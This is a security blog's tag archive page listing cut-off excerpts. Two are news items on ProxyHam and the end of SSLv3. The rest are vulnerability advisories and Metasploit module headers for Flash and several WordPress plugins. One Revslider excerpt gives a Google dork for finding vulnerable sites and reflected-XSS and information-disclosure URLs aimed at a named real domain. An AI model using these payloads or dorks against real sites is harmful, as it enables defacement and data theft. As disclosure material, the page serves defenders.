Tags archives: sicurezza

 

0

ProxyHam, per navigare in Internet in anonimato

Il dispositivo open source si connette al Wi-Fi e trasmette la connessione Internet di un utente con un collegamento radio a un computer lontano dai 1.600 ai 4.000 metri. Un sistema per cui l’utente anonimo rimane al sicuro a casa a oltre 1.600 metri di distanza dal suo indirizzo IP. E’ ProxyHam, un “proxy hardware” […]

 

0

That shot you heard? SSLv3 is now DEAD

We really, really, really mean it this time: take SSL3 and bury it. That’s the message from the home of all things Internet the Internet Engineering Task Force, which has issued the “take it behind the shed” edict in this RFC. It’s actually only formalising what the IETF and industry already knew: SSLv3 is ancient […]

 

0

Adobe Flash Player Drawing Fill Shader Memory Corruption

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking   include Msf::Exploit::Remote::BrowserExploitServer   def initialize(info={}) super(update_info(info, ‘Name’ => ‘Adobe Flash Player Drawing Fill Shader Memory Corruption’, ‘Description’ => %q{ This module exploits a memory corruption happening when applying a Shader as […]

 

0

WordPress WP-Instance-Rename 1.0 File Download

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-06-12 Download Site: https://wordpress.org/plugins/wp-instance-rename/ Vendor: Vlajo Vendor Notified: 2015-06-12 Advisory: http://www.vapid.dhs.org/advisory.php?v=127 Vendor Contact: Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration […]

 

0

WordPress Nextend Twitter Connect 1.5.1 Cross Site Scripting

Wordpress “Nextend Twitter Connect” =================================== Document Title: =============== WordPress “Nextend Twitter Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)   Download URL:   =============   https://wordpress.org/plugins/nextend-twitter-connect/   Release Date:   ============= 2015-06-20   Vulnerability CVE ID:   ===================== CVE-2015-4557   Vulnerability Disclosure Timeline:   ================================== 2015 – 06 – 15 First […]

 

0

WordPress Front-end Editor File Upload

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper   def initialize(info = {}) super(update_info( info, ‘Name’ => ‘Wordpress Front-end Editor File Upload’, ‘Description’ => %q{ The Wordpress Front-end Editor plugin contains an authenticated file upload […]

 

0

WordPress Revslider 4.2.2 XSS / Information Disclosure

| # Title : WordPress Revslider 4.2.2 Multi Vulnerability | # Author : indoushka | # email :indoushka4ever@gmail.com | # Dork : inurl:admin-ajax.php?action=revslider_show_image -intext:”revslider_show_image” | # Tested on: windows 8.1 Français V.(Pro) | # Download : http://revolution.themepunch.com/ =======================================   XSS :   http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php   information Disclosure :   http://www.codekom.com/wp-content/plugins/revslider/revslider_admin.php   http://www.codekom.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css   Arbitrary File Download […]

 

0

WordPress Google Analyticator 6.4.9.3 CSRF

# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin v6.4.9.3 before rev @1183563 # Submitter: Nitin Venkatesh # Product: Google Analyticator Wordpress Plugin # Product URL: https://wordpress.org/plugins/google-analyticator/ # Vulnerability Type: Cross-Site Request Forgery [CWE-352] # Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier # Tested versions: v6.4.9.3 rev @1168849 # Fixed Version: v6.4.9.3 […]

 

 

0

WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

# Title: Multiple vulnerabilities in WordPress plugin “NewStatPress” # Author: Adrián M. F. – adrimf85[at]gmail[dot]com # Date: 2015-05-25 # Vendor Homepage: https://wordpress.org/plugins/newstatpress/ # Active installs: 20,000+ # Vulnerable version: 0.9.8 # Fixed version: 0.9.9 # CVE: CVE-2015-4062, CVE-2015-4063   Vulnerabilities (2) =====================   (1) Authenticated SQLi [CWE-89] (CVE-2015-4062) ———————————————–   * CODE: includes/nsp_search.php:94 +++++++++++++++++++++++++++++++++++++++++ for($i=1;$i<=3;$i++) […]